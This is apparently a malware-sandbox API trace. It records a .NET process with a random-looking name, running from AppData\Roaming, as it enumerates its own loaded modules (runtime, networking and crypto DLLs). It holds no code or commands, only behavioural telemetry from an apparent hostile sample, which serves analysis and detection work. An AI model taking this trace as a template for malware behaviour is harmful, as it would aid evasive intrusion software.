[0142.943] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x743d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0142.944] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x743d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0142.944] GetModuleInformation (in: hProcess=0x2a0, hModule=0x741b0000, lpmodinfo=0x25cbca0, cb=0xc | out: lpmodinfo=0x25cbca0*(lpBaseOfDll=0x741b0000, SizeOfImage=0x2b000, EntryPoint=0x741b5680)) returned 1 [0142.945] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x741b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0142.945] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x741b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0142.946] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d50000, lpmodinfo=0x25cdda4, cb=0xc | out: lpmodinfo=0x25cdda4*(lpBaseOfDll=0x76d50000, SizeOfImage=0xc000, EntryPoint=0x76d53930)) returned 1 [0142.946] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0142.948] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0142.948] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f840000, lpmodinfo=0x25cfed0, cb=0xc | out: lpmodinfo=0x25cfed0*(lpBaseOfDll=0x6f840000, SizeOfImage=0x8000, EntryPoint=0x6f8417b0)) returned 1 [0142.949] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f840000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0142.949] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f840000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0142.949] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69370000, lpmodinfo=0x25d1fdc, cb=0xc | out: lpmodinfo=0x25d1fdc*(lpBaseOfDll=0x69370000, SizeOfImage=0x6e1000, EntryPoint=0x6939cd70)) returned 1 [0142.950] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69370000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0142.950] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69370000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0142.951] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a880000, lpmodinfo=0x25d410c, cb=0xc | out: lpmodinfo=0x25d410c*(lpBaseOfDll=0x6a880000, SizeOfImage=0xf5000, EntryPoint=0x6a8d4160)) returned 1 [0142.952] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a880000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0142.952] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a880000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0142.953] GetModuleInformation (in: hProcess=0x2a0, hModule=0x680b0000, lpmodinfo=0x25d6240, cb=0xc | out: lpmodinfo=0x25d6240*(lpBaseOfDll=0x680b0000, SizeOfImage=0x12b2000, EntryPoint=0x0)) returned 1 [0142.953] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x680b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0142.954] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x680b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")) returned 0x68 [0142.954] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74dc0000, lpmodinfo=0x25d83e8, cb=0xc | out: lpmodinfo=0x25d83e8*(lpBaseOfDll=0x74dc0000, SizeOfImage=0xeb000, EntryPoint=0x74dfd650)) returned 1 [0142.955] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74dc0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0142.955] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74dc0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0142.956] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73dd0000, lpmodinfo=0x25da4ec, cb=0xc | out: lpmodinfo=0x25da4ec*(lpBaseOfDll=0x73dd0000, SizeOfImage=0x75000, EntryPoint=0x73e09a60)) returned 1 [0142.957] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73dd0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0142.957] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73dd0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0142.958] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69e40000, lpmodinfo=0x25dc5f8, cb=0xc | out: lpmodinfo=0x25dc5f8*(lpBaseOfDll=0x69e40000, SizeOfImage=0x80000, EntryPoint=0x69e41180)) returned 1 [0142.958] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69e40000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0142.959] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69e40000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0142.960] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76680000, lpmodinfo=0x25de738, cb=0xc | out: lpmodinfo=0x25de738*(lpBaseOfDll=0x76680000, SizeOfImage=0x92000, EntryPoint=0x766b8cf0)) returned 1 [0142.960] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76680000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0142.961] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76680000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0142.961] GetModuleInformation (in: hProcess=0x2a0, hModule=0x676e0000, lpmodinfo=0x25e084c, cb=0xc | out: lpmodinfo=0x25e084c*(lpBaseOfDll=0x676e0000, SizeOfImage=0x9cc000, EntryPoint=0x0)) returned 1 [0142.962] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x676e0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0142.962] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x676e0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")) returned 0x64 [0142.965] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69c40000, lpmodinfo=0x25e29e8, cb=0xc | out: lpmodinfo=0x25e29e8*(lpBaseOfDll=0x69c40000, SizeOfImage=0x18f000, EntryPoint=0x0)) returned 1 [0142.965] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69c40000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0142.966] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69c40000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\system.drawing.ni.dll")) returned 0x74 [0142.967] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66a70000, lpmodinfo=0x25e4bb4, cb=0xc | out: lpmodinfo=0x25e4bb4*(lpBaseOfDll=0x66a70000, SizeOfImage=0xc67000, EntryPoint=0x0)) returned 1 [0142.967] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66a70000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0142.968] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66a70000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\system.windows.forms.ni.dll")) returned 0x80 [0142.969] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6b4d0000, lpmodinfo=0x25e6da4, cb=0xc | out: lpmodinfo=0x25e6da4*(lpBaseOfDll=0x6b4d0000, SizeOfImage=0x92000, EntryPoint=0x6b4ddd60)) returned 1 [0142.970] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0142.970] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0142.971] GetModuleInformation (in: hProcess=0x2a0, hModule=0x72d30000, lpmodinfo=0x25e8f68, cb=0xc | out: lpmodinfo=0x25e8f68*(lpBaseOfDll=0x72d30000, SizeOfImage=0x20f000, EntryPoint=0x72ddb0a0)) returned 1 [0142.972] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x72d30000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0142.972] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x72d30000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll")) returned 0x77 [0142.973] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73db0000, lpmodinfo=0x25eb234, cb=0xc | out: lpmodinfo=0x25eb234*(lpBaseOfDll=0x73db0000, SizeOfImage=0x1d000, EntryPoint=0x73db3b10)) returned 1 [0142.974] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73db0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0142.975] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73db0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0142.975] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66320000, lpmodinfo=0x25ed340, cb=0xc | out: lpmodinfo=0x25ed340*(lpBaseOfDll=0x66320000, SizeOfImage=0x721000, EntryPoint=0x0)) returned 1 [0142.976] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66320000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0142.977] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66320000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")) returned 0x6e [0142.978] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66220000, lpmodinfo=0x25ef4fc, cb=0xc | out: lpmodinfo=0x25ef4fc*(lpBaseOfDll=0x66220000, SizeOfImage=0xf1000, EntryPoint=0x0)) returned 1 [0142.978] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66220000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Configuration.ni.dll") returned 0x1b [0142.979] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66220000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\fe4b221b4109f0c78f57a792500699b5\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\fe4b221b4109f0c78f57a792500699b5\\system.configuration.ni.dll")) returned 0x80 [0142.980] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65b00000, lpmodinfo=0x25f16ec, cb=0xc | out: lpmodinfo=0x25f16ec*(lpBaseOfDll=0x65b00000, SizeOfImage=0x71e000, EntryPoint=0x0)) returned 1 [0142.981] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65b00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Xml.ni.dll") returned 0x11 [0142.982] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65b00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\4fbda26d781323081b45526da6e87b35\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\4fbda26d781323081b45526da6e87b35\\system.xml.ni.dll")) returned 0x6c [0142.982] GetModuleInformation (in: hProcess=0x2a0, hModule=0x764d0000, lpmodinfo=0x25f38a0, cb=0xc | out: lpmodinfo=0x25f38a0*(lpBaseOfDll=0x764d0000, SizeOfImage=0x6000, EntryPoint=0x764d1460)) returned 1 [0142.983] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0142.984] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0142.985] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a50000, lpmodinfo=0x25f59a4, cb=0xc | out: lpmodinfo=0x25f59a4*(lpBaseOfDll=0x65a50000, SizeOfImage=0xa5000, EntryPoint=0x65a6ac50)) returned 1 [0142.986] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rasapi32.dll") returned 0xc [0142.987] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll")) returned 0x20 [0142.988] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a20000, lpmodinfo=0x25f7ab8, cb=0xc | out: lpmodinfo=0x25f7ab8*(lpBaseOfDll=0x65a20000, SizeOfImage=0x23000, EntryPoint=0x65a25570)) returned 1 [0142.989] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a20000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rasman.dll") returned 0xa [0142.990] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a20000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll")) returned 0x1e [0142.991] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a10000, lpmodinfo=0x25f9bc4, cb=0xc | out: lpmodinfo=0x25f9bc4*(lpBaseOfDll=0x65a10000, SizeOfImage=0x10000, EntryPoint=0x65a13820)) returned 1 [0142.992] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a10000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rtutils.dll") returned 0xb [0142.993] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a10000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll")) returned 0x1f [0142.994] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f30000, lpmodinfo=0x25fbcd0, cb=0xc | out: lpmodinfo=0x25fbcd0*(lpBaseOfDll=0x73f30000, SizeOfImage=0x5f000, EntryPoint=0x73f34af0)) returned 1 [0143.002] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f30000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ws2_32.dll") returned 0xa [0143.003] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f30000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")) returned 0x1e [0143.004] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71400000, lpmodinfo=0x25fdddc, cb=0xc | out: lpmodinfo=0x25fdddc*(lpBaseOfDll=0x71400000, SizeOfImage=0x4f000, EntryPoint=0x7140d850)) returned 1 [0143.005] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71400000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0143.006] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71400000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")) returned 0x1f [0143.007] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71450000, lpmodinfo=0x25ffee8, cb=0xc | out: lpmodinfo=0x25ffee8*(lpBaseOfDll=0x71450000, SizeOfImage=0x9b000, EntryPoint=0x7148f7e0)) returned 1 [0143.008] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71450000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="winhttp.dll") returned 0xb [0143.009] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71450000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll")) returned 0x1f [0143.010] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71520000, lpmodinfo=0x2601ff4, cb=0xc | out: lpmodinfo=0x2601ff4*(lpBaseOfDll=0x71520000, SizeOfImage=0x12000, EntryPoint=0x71524510)) returned 1 [0143.011] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71520000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ondemandconnroutehelper.dll") returned 0x1b [0143.012] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71520000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ondemandconnroutehelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll")) returned 0x2f [0143.820] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0143.820] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f90000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0143.828] CoTaskMemFree (pv=0x55b0d0) [0143.828] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0143.828] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f90000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPT32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")) returned 0x1f [0143.830] CoTaskMemFree (pv=0x55b0d0) [0143.830] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0143.830] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764c0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0143.831] CoTaskMemFree (pv=0x55b0d0) [0143.831] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0143.831] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764c0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSASN1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")) returned 0x1e [0143.833] CoTaskMemFree (pv=0x55b0d0) [0143.833] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0143.833] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f960000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mskeyprotect.dll") returned 0x10 [0143.834] CoTaskMemFree (pv=0x55b0d0) [0143.834] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0143.834] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f960000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll")) returned 0x24 [0143.835] CoTaskMemFree (pv=0x55b0d0) [0143.835] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0143.835] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f940000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ncrypt.dll") returned 0xa [0143.837] CoTaskMemFree (pv=0x55b0d0) [0143.837] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0143.837] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f940000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll")) returned 0x1e [0143.839] CoTaskMemFree (pv=0x55b0d0) [0143.839] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0143.839] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f910000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="NTASN1.dll") returned 0xa [0143.840] CoTaskMemFree (pv=0x55b0d0) [0143.840] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0143.840] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f910000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NTASN1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll")) returned 0x1e [0143.841] CoTaskMemFree (pv=0x55b0d0) [0143.841] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0143.841] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ncryptsslp.dll") returned 0xe [0143.843] CoTaskMemFree (pv=0x55b0d0) [0143.843] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0143.843] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll")) returned 0x22 [0143.844] CoTaskMemFree (pv=0x55b0d0) [0143.844] CloseHandle (hObject=0x2a0) returned 1 [0144.143] GetCurrentProcessId () returned 0xbb4 [0144.144] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb4) returned 0x2a0 [0144.144] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x23afb58, cb=0x100, lpcbNeeded=0x19e600 | out: lphModule=0x23afb58, lpcbNeeded=0x19e600) returned 1 [0144.145] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x23afc64, cb=0x200, lpcbNeeded=0x19e600 | out: lphModule=0x23afc64, lpcbNeeded=0x19e600) returned 1 [0144.147] GetModuleInformation (in: hProcess=0x2a0, hModule=0x400000, lpmodinfo=0x23afea4, cb=0xc | out: lpmodinfo=0x23afea4*(lpBaseOfDll=0x400000, SizeOfImage=0x8000, EntryPoint=0x0)) returned 1 [0144.147] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.147] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x400000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe") returned 0x3a [0144.147] CoTaskMemFree (pv=0x55b0d0) [0144.147] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.147] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x400000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe")) returned 0x60 [0144.148] CoTaskMemFree (pv=0x55b0d0) [0144.148] GetModuleInformation (in: hProcess=0x2a0, hModule=0x771d0000, lpmodinfo=0x23b20b0, cb=0xc | out: lpmodinfo=0x23b20b0*(lpBaseOfDll=0x771d0000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0144.148] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.148] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x771d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0144.148] CoTaskMemFree (pv=0x55b0d0) [0144.148] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.148] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x771d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0144.148] CoTaskMemFree (pv=0x55b0d0) [0144.148] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f850000, lpmodinfo=0x23b41b4, cb=0xc | out: lpmodinfo=0x23b41b4*(lpBaseOfDll=0x6f850000, SizeOfImage=0x59000, EntryPoint=0x6f860780)) returned 1 [0144.149] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.149] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f850000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0144.149] CoTaskMemFree (pv=0x55b0d0) [0144.149] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0144.149] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f850000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0144.149] CoTaskMemFree (pv=0x55b0d0) [0144.149] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76720000, lpmodinfo=0x23b62c0, cb=0xc | out: lpmodinfo=0x23b62c0*(lpBaseOfDll=0x76720000, SizeOfImage=0xe0000, EntryPoint=0x76733980)) returned 1 [0144.150] 